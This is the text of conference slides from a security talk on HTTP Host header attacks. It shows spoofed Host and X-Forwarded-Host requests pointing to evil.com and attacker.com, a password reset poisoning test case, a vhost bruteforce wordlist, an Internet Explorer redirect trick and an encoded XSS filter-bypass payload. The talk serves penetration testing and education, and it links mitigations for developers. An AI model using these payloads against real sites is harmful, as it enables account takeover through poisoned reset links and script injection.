Slides from my talk @ defcon russia

1. Sergey Belov
@sergeybelove

2. 2 main puproses:
 Virtual host
 Proxy balancer
GET / HTTP/1.1
Host: www.example.com
...

3. Tampering can leak to:
 Password reset poisoning
 Cache poisoning
 Access to internal hosts
 Cross Site Scripting + filter bypass

4. Normal cases:
 <a href=“//user/page”>page</a>
 <a href=“http://example.com/user/page”>page</a>

5. Possible results after tampering:
 Error
 Default host / N/A
 First virtual host (apache / nginx – 000-default.conf)
 Tampered header in result html
GET / HTTP/1.1
Host: www.evil.com
...

6. Test case:
1) Go to password reset page
2) Spoof HOST header to attacker.com
3) Use victim’s email & submit

7. http://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html

8. http://www.acunetix.com/blog/articles/automated-detection-of-host-header-attacks/

9. Possible victims:
• Drupal
• Django
• Joomla
• ...?
For developers:
• https://docs.djangoproject.com/en/1.8/ref/settings/#std:setting-ALLOWED_HOSTS
• https://www.drupal.org/node/2221699

11. Normal cases:
 <a href=“//user/page”>page</a>
 <a href=http://example.com/user/page>page</a>

12. 1) Spoof
GET / HTTP/1.1
Host: www.evil.com

13. 2) Spoof with 2 headers
GET / HTTP/1.1
Host: www.example.com
Host: www.evil.com

14. 3) Spoof with X-Forwarded
GET / HTTP/1.1
Host: www.evil.com
X-Forwarded-Host: evil.com

15. 1,2,3 can leak to perm XSS on
server side

16. A typical action while penesting – bruteforcing subdomains
What about HOST header bruteforcing?

17.  Let’s try to bruteforce HOST here!

18. MSF - /modules/auxiliary/scanner/http/vhost_scanner.rb – isn’t good
valstr = [
"admin",
"services",
"webmail",
"console",
"apps",
"mail",
"intranet",
"intra",
"spool",
"corporate",
"www",
"web"
]

19. example.com
Prefixes
• beta.example.com
• dev.example.com
• ...
Zones
• example.test
• example.dev
• example.beta
• ...
+ different combinations
https://github.com/BeLove/avhbf - good :)

20. Facts:
 Originally disclosed by @Black2Fan in 2013
 HOST header appears in result HTML
 Works only in IE

21. Our goal
–
Spoof HOST header in request by
victim (like a reflected XSS/CSRF)

22.  Host header after redirect
 Normal case
Response:
...
Location: http://example.com%2flogin.php
Request:
...
Host: example.com

23.  Host header after redirect
 IE (any version) case
Response:
...
Location: http://example.com%2flogin.php
Request:
...
Host: example.com/login.php

24. GET /login.phphp/ HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: pl-PL
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64;
Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: example.com/login.php
DNT: 1
Connection: Keep-Alive
Cache-Control: no-cache

26.  XSS filter bypass (original example)
http://blackfan.ru
%252F<img%252Fsrc='x'onerror=alert(1)>
%252F.%252e%252F.%252e%252F%253F%2523

27. Now
https://sergeybelove.ru/one-button-scan/
can do this check & auto-generate exploits

28.  http://www.skeletonscribe.net/2013/05/practical-http-host-header-
attacks.html
 https://web.archive.org/web/20131107024350/http://blackfan.ru/
 http://www.acunetix.com/blog/articles/automated-detection-of-host-
header-attacks/
 http://blog.bentkowski.info/2015/04/xss-via-host-header-cse.html

29. Spoof host header while
pentesting1!11!!1!!!!
Any questions?
@sergeybelove